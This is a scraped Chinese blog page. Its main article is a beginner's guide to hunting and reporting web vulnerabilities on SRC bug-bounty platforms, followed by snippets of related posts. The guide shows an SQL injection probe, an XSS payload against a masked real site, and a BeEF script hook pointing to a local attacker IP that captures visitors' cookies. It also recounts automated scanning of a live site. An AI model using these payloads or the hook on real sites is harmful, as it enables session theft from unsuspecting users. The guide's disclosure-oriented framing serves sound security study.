精华内容
下载资源
问答
  • 初识SRC漏洞平台提交漏洞

    万次阅读 多人点赞 2019-03-08 22:05:31
    1.1 漏洞平台 补天漏洞响应平台:https://butian.360.cn/ 漏洞银行:https://www.bugbank.cn/ ...i春秋SRC部落:https://www.ichunqiu.com/src 腾讯应急响应中心:https://security.tencent.com/index.php...

    //由于初学时使用工具较多,不建议对目标进行大批量扫描,手测为主,工具为辅,下文仅作示例,明白大体流程即可,实操为真。

    1.1 漏洞平台

    补天漏洞响应平台:https://www.butian.net/

    漏洞银行:https://www.bugbank.cn/

    阿里云漏洞响应平台:https://security.alibaba.com/

    i春秋SRC部落:https://www.ichunqiu.com/src

    腾讯应急响应中心:https://security.tencent.com/index.php

    网易、百度等等。

     

    1.2 网站情况

    常见漏洞类型:

    XSS、SQL注入、CSRF、权限绕过、文件上传、弱口令、代码执行等等。

     

    发现漏洞方法:

    1. 手工寻找(XSS,SQL注入,CSRF等等)。

    难度系数:⭐⭐⭐⭐  牛逼指数:⭐⭐⭐⭐⭐

    一般漏洞平台上除了刚出的服务厂商,其他大多数很明显的漏洞都被提交过了,手工找有些难度,有些网站在对非法字符的过滤也很到位,在url尝试是否存在sql注入,如 and 1=2 ,网站防护机制对用户一旦出现此类非法字符串,便对访问者ip进行连接重置,一段时间后才能访问。

     

    2. 工具扫描/辅助(AWVS、Nessus、sqlmap等等)

    难度系数:⭐⭐  牛逼指数:⭐⭐⭐

    在漏洞平台上的厂商,同样大部分明显直接的漏洞比较少,再加上有的有防火墙和web服务器配置,很多网站只要’察觉’到一个ip的非正常访问(比如扫描网站),就直接采用连接重置,或者无法访问,对扫描ip墙在外面。所以扫描工具的使用,也有一定条件。

     

    3. 手工寻找+工具扫描/辅助

    难度系数:⭐⭐⭐  牛逼指数:⭐⭐⭐⭐ 实用指数:⭐⭐⭐⭐⭐

    通过工具的辅助,找到漏洞点再结合自身知识利用漏洞,往往事半功倍,很有效果

     

    防护情况案例一:(可能会涉及到什么所以对厂商均打码)

    厂商:

     

    子网站教务系统,页面通过单独窗口实现信息显示,url无法测试。

     

    防护情况案例二:

    厂商

     

    找到asp脚本编写同时有id传参的页面

     

    尝试注入语句

    /video_list.aspx?s_classid=221 and 1=2

    回车

     

    防火墙拦截。

    防护情况案例三:

    厂商:大部分厂商

    即扫描工具扫描,服务器防御灵敏的直接墙掉ip,放宽点的当你扫描一定时候到达一定的时候,重置连接。

     

    1.3 发现/提交漏洞

    厂商

    网址:

     

    发现步骤

    1. 手工寻找

    网页的大部分新闻内容全为静态的内容,无下手之地。

     

    直到

     

    进入后是该网站的一个子网站,熟悉的php,寻找漏洞点

     

    注册:

     

    在手工找不到可能存在的漏洞点,尝试工具扫描

    //2021年注:由于19年刚接触使用工具较多,现阶段原则上是不允许批量漏扫工具对网站进行扫描,多以手工加漏洞验证为主。

    //以下示例仅熟悉流程即可,勿学博主用工具直接扫!!!!!!。勿学博主用工具直接扫!!!!!!

    //手工测试可对url进行burp的xss语句检测即可。

     

    使用工具(AWVS)进行站点扫描

    幸运的是,该站点对扫描没有进行设置防御,

    扫到该站点的目录

    其中Forbidden是权限不够无法访问,但是文件存在。

     

    接下来,很明显的看到了极有可能是后台admin目录

    不幸的是,能访问,文件也存在,无回显内容

     

    一片空白,继续换下一个思路

    查看是否存在漏洞。

    其中显目的第一个 Cross Site Scripting (XSS)

    寻找到这三个漏洞点

     

     

    进入直接弹出对话框

    接下来看是什么地方存在漏洞点:

     

    渗透测试XSS语句

    '%22()%26%25<acx><ScRiPt%20>prompt(931058)</ScRiPt>&system=ask&url=e

    经过简化

    %22 是url编码后的,原数据为 ” ,一个双引号,用于对html元素属性进行结束

     

    效果等同于:"><ScRiPt >alert(123)</ScRiPt>

     

    这里<acx><ScRiPt%20>prompt(931058)</ScRiPt> script采用了大小写重复,常用的绕过方法。其中prompt(931058) 是js中与用户交互的提示框,标题就为931058.

    其中prompt(931058)是工具的测试语句,换成熟悉的alert(‘XSS’) 便明显很多。

     

    这也能说明当右键编辑http请求的时候会弹出对话框。

     

    知道漏洞点漏洞原理后,找到漏洞点:

     

    /index.php/core/uploader-image_cut?module=item&system=ask&url=e

     

     

    其中/index.php/core为上文的注册页面,手工注册是打不开的,这也说明了工具利用的重要性。

    利用测试语句测试漏洞的存在

     

    漏洞是存在的,单单的弹窗无法提现出此漏洞的作用,

     

    接下来利用XSS漏洞

     

    利用工具:beef (kali下的xss平台)

     

    利用步骤:

     

    1. beef工具平台开启

     

     

    Kali ip:192.168.88.149

     

    2. 制造XSS利用链接:

    ’"()<acx><script src="http://192.168.88.149:3000/hook.js"> </script>

     

     

    3. 访问者访问

    Win10

    回车后,直观上网页无反应

     

    4. 查看beef平台

     

    可以看到ip,操作系统,系统软件的配置

    重要的在下面

     

    拿到访问者的访问cookie,可通过改包修改cookie登录访问者用户。

     

    到此结束,没有进一步的渗透(还不会高级的)。

     

    下面为漏洞提交的页面

     

     

     

    1.4 思路总结

    1. 学会工具和手工结合,会有意外收获。

    2. 常规注入点,漏洞点别放过。

    3. 发现漏洞,需测试漏洞的存在性(别破坏网站的完整)

    4. 漏洞利用,进一步提现漏洞的价值性,在提交的时候需要有漏洞利用过程截图等。

    5. 最后提出解决方案,完事。

    不做破坏!授权测试!

    展开全文
  • 最近几年总结收集的SRC漏洞挖掘实战经验,希望对你有帮助。
  • 国内SRC漏洞挖掘技巧与经验分享 包括:信息收集、字典生成、业务安全、APP测试等内容
  • CSAA-Web分享-面向SRC漏洞挖掘:介绍SRC上常见SQL、XSS、CSRF漏洞挖掘
  • SRC漏洞挖掘实用技巧

    2020-11-18 17:43:18
  • SRC漏洞挖掘之偏门资产收集篇

    千次阅读 2020-05-11 20:15:45
    SRC漏洞挖掘之偏门资产收集篇 写这篇文章的目得,就是跟大家分享一下平时我挖src漏洞的一些经验,当自己挖到某个站点的漏洞时,往往就会欣喜若狂的往src平台上提交,得到的结果却是 “漏洞已重复,感谢提交“ ,...

    SRC漏洞挖掘之偏门资产收集篇

    写这篇文章的目得,就是跟大家分享一下平时我挖src漏洞的一些经验,当自己挖到某个站点的漏洞时,往往就会欣喜若狂的往src平台上提交,得到的结果却是 “漏洞已重复,感谢提交“ ,其实这结果很影响一个刚接触挖洞的人的积极性的。后来想想也是,你能搜索到的,别人也可以搜索到。所以经过一段时间的磨练,我总结了以下刷公益 src 漏洞中的偏门资产收集的办法,大大提高了漏洞的质量,以及节省很多收集资产的时间。

    一丶技术支持

    首先观察一下网站底部是否有技术支持:xxxx|网站建设:xxxx之类的标注,一些建站企业会出于知识产权保护或者是对外宣传自己的公司,会在自家搭建的网站上挂上技术支持等之类的标注,很多建站企业往往某种类型的网站都是套用的同一套源码,换汤不换药,运气不错的话,那我们的事件就秒变通用啦~

    我的第一个CNVD通用证书就是通过这种方式拿到的

    下面讲解一下当发现技术支持的一些网站的具体思路

    1.网站官网找客户案例

    我们就可以进这个建站官网,找客户案例,寻找同模板的案例网站,一般的网站建设公司都是用同一套模板的,这样的话一站有洞,全站遭殃~

    2.搜索引擎

    有些建站企业的官网不会放这些客户案例,那就可以用我们的第二种方法,那就是搜索引擎。黑客语法用起来~

    www.Google.com

    https://fofa.so/

    https://cn.bing.com

     二丶IP反查域名

    可能有些建站或者企业再建站的时候会用到同一套CMS,但是他们不会标注技术支持之类的标识,而且有些网站基本从那些搜索引擎搜索不到的,但是企业为了节省开支,会将自己的网站搭建在一个服务器上,所以这一招就很好用,一键反查域名,所有网站就全部爆露出来了,我曾经一个IP反查域名,将一个建站企业的200多个网站,直接打包了~

    https://dns.aizhan.com/(爱站网IP反查域名)

     三丶ICP备案查询

    https://icp.aizhan.com(爱站网ICP网站备案查询)

    有一部分公司由于业务需要,会在自己名下注册多个站址或者同一域名下的子域名会使用相 同的 cms,有时候可能不是同一套 cms,但也会是同一种类型的网站,我以公益 src 的某站点 举例:该站点并不是一套 cms,但都是同类型的站点。

     四丶友情链接

    在请教一个逻辑漏洞挖掘的大佬时,他就就跟我说友链是一个很香的东西,并且权重都很高。很多网站为了提高权重,会相互挂友情链接,以增加收录,网站首页占据整站的权重 最大,所以友情链接在外链中所占的权重传递也是最高的,一般友情链接也习惯挂在网站首 页的最下边。此外,友情链接都和本站的的主题均相关联,所以你若习惯挖一种类型的网站, 那友情链接是你的不二之选,在测试过程中多多注意,会省下你大把收集资源的时间!

    五丶其他

    还有一些大众人都用的方法,比如一些子域名,端口,搜索引擎的关键词搜索,这个就要看你思路够不够骚了~因为大部分的关键词搜索出来的漏洞,基本都被提交过了,这个就靠你的脑洞了,比如xxx用品,xxx商城,这个xxx就看你思路够不够骚了~

    Seay的子域名挖掘机

    7kbscan url采集工具

     还有nmap等一些集成工具

    六丶总结

    其实以上方法学会了,对于漏洞的挖掘其实就跟简单了,既能保证漏洞的质量不会有太多的重复,也可以提高自己漏洞挖掘的数量以及速度,这些都是我个人运用的,可能不是很完整,但是很实用,欢迎各位大佬指导~

    展开全文
  • 我是如何挖掘src漏洞的 我拿到一个网站先看看网页。看网址后面存在注入漏洞没有,然后网址后面加robots.txt看看存不存在敏感信息泄露,然后再收集子域名,进行简单的弱口令爆破,用扫描目录的扫描目录看看有没有上传...

    我是如何挖掘src漏洞的

    我拿到一个网站先看看网页。看网址后面存在注入漏洞没有,然后网址后面加robots.txt看看存不存在敏感信息泄露,然后再收集子域名,进行简单的弱口令爆破,用扫描目录的扫描目录看看有没有上传漏洞和遍历漏洞及敏感信息等等,建议除了有的字典再根据平时挖漏洞扫描的最多的目录,自己再制作属于自己的字典,还有就是后台弱口令爆破和后台注入,验证码爆破漏洞,盘多多等等网盘收集一些泄露的信息,也存在中危漏洞,谷歌语法的使用,商场网站多找逻辑漏洞,注册点和购买商品存在的漏洞多,根据网站来确定使用什么方法来挖。网站不同存在的漏洞多少的地方也不同。还在微信公众号里面找一些工具的使用和介绍。

    展开全文
  • src漏洞挖掘经验分享 – 掌控安全以恒 一、公益src 公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞在漏洞盒子进行提交。 在挖掘src的时候不能越红线,一般情况下遇到...
  • 关于各大SRC漏洞挖掘经验分享,很多思路总有一款适合你。介绍了SRC流程测试的最基本的步骤,也有一些操作分享
  • 1漏洞平台 2网站情况 3发现/提交漏洞 4思路总结 1漏洞平台 漏洞银行 https://www.bugbank.cn/ 漏洞盒子 https://www.vulbox.com/ i春秋SRC部落 https://www.ichunqiu.com/src 补天漏洞响应平台 ...
  • 补天SRC漏洞数排名

    千次阅读 2019-02-17 20:12:33
    今日(2019.02.17)爬取了补天漏洞平台众测SRC的总漏洞数和已解决漏洞数的数据,下面分享总漏洞数100排名和已解决漏洞数100排名。各大公司诸如BAT、美团等目前都有自己的SRC平台,其他公司及高校大多在补天SRC平台进行...
  • src漏洞类型总结

    2021-01-20 17:49:29
    一,易出现处 ①照片访问类代目录类处 ...逻辑漏洞 ①cookie混淆–>两个同时进行找回密码 (利用原理–>同一个浏览器中同时找回两个账户的密码,即一个浏览器找回不同密码时,两个账号的cookie相同导致的) (验
  • 公益src漏洞挖掘

    2021-04-17 23:28:48
    某制作业公司存在sql注入 判断字段数 为8个 语法order by 8 字段...schema.columns where table_schema=‘xxxxxxxxxxxx’ and table_name=‘admin’ 测到这里就结束了 总体而言比较简单 通过谷歌语法可以查询到很多漏洞
  • 关于SRC漏洞挖掘的经验

    千次阅读 2020-02-19 11:14:45
    在各大平台,比如漏洞盒子,补天,360众测等等都纷纷成立了安全响应中心,许多的企业在上面入驻,给白帽子们提供了一个很好的平台,避免了黑客利用漏洞而造成损失。 一. 资产收集 在挖掘SRC中,我们首先要做的就是...
  • 漏洞银行https://www.bugbank.cn/漏洞盒子https://www.vulbox.com/i春秋SRC部落https://www.ichunqiu.com/src补天漏洞响应平台https://butian.360.cn/腾讯安全应急响应中心http://security.tencent.com/网易安全中心...
  • 自动化扫描src漏洞

    2018-11-27 20:02:00
    首先介绍一下常见的漏洞类型: 漏洞自动扫描思路: 常见的一些github上常用的漏洞采集工具,我们可以利用一款工具进行接口调用直接进行利用 自动化工具的雏形: 转载于:...
  • 参加双11保卫战活动,针对活动我们发生的事情,而不是针对src 事情还得从6号提交菜鸟的漏洞说起。 提交了个漏洞因为怕不稳,把2个大洞打包提交了,然后19号收到消息内部已知,内部已知的聊天记录也是说了下这个...
  • 对一次SRC平台漏洞挖掘,全程文字描述多一点。 测试范围: XXXXX平台: www.A.com Xxxxxxx平台: www.B.com 本人信息搜集不是很6,我这里直接测他的某个站的主站。所以我决定一个一个测,防止漏过,很多人一般都是...
  • SRC之逻辑漏洞挖掘

    2020-06-19 17:19:12
    挖掘逻辑漏洞一般方法: 1. 发现网站所提供的功能模块; 2. 针对具体的功能确定业务流程; 3. 拦截HTTP/HTTPS请求,分析其参数的含义; 4. 修改参数值,尝试出发逻辑漏洞; 5. 返回第2步骤,对其他功能继续测试...
  • ***本文适合新手参阅,大牛笑笑就好了,嘿嘿 末尾有彩蛋!!!!!!!!!...本人参加了本次"i春秋部落守卫者联盟"活动,由于经验不足,首次挖SRC,排名不是那么理想,终于知道了...漏洞不会仅限于SQL注入、命令执行...
  • SRC混子的漏洞挖掘之道

    千次阅读 2020-12-28 10:17:18
    一个SRC混子挖SRC的半年经验分享~,基本都是...微信小程序,企业专利品牌信息,企业邮箱,电话等等,对于很多万人挖的src来说,你收集到了别人没有收集过的资产,往往离挖到漏洞就不远了。 企业相关信息收集 企查查
  • src逻辑漏洞挖掘经验分享

    万次阅读 多人点赞 2019-05-07 09:59:07
    巧用搜索引擎首推谷歌查看了解src旗下涉及到的业务,收集其对应的业务下的域名,在进一步进行挖掘,比如: 整理后,在进行常规资产收集。 1.2常规性质资产收集 基本的资产收集方式:子域名枚举、端口扫描、路径...
  • 文章来源i春秋 本文适合新手参阅,大牛笑笑就好了,嘿嘿末尾有彩蛋!!!!!!!!...本人参加了本次"i春秋部落守卫者联盟"活动,由于经验不足,首次挖SRC,排名不是那么理想,终于知道了自己...漏洞不会仅限于SQL注...
  • Web渗透——SRC常用漏洞挖掘技巧

    千次阅读 2020-06-15 20:51:08
    QQ 1274510382 Wechat JNZ_aming 商业联盟 QQ群538250800 技术搞事 QQ群599020441 解决方案 QQ群152889761 加入我们 QQ群649347320 共享学习 QQ群674240731 ...通常漏洞是会存在于2或者3步骤中,下面..

空空如也

空空如也

1 2 3 4 5 ... 20
收藏数 29,590
精华内容 11,836
关键字:

src漏洞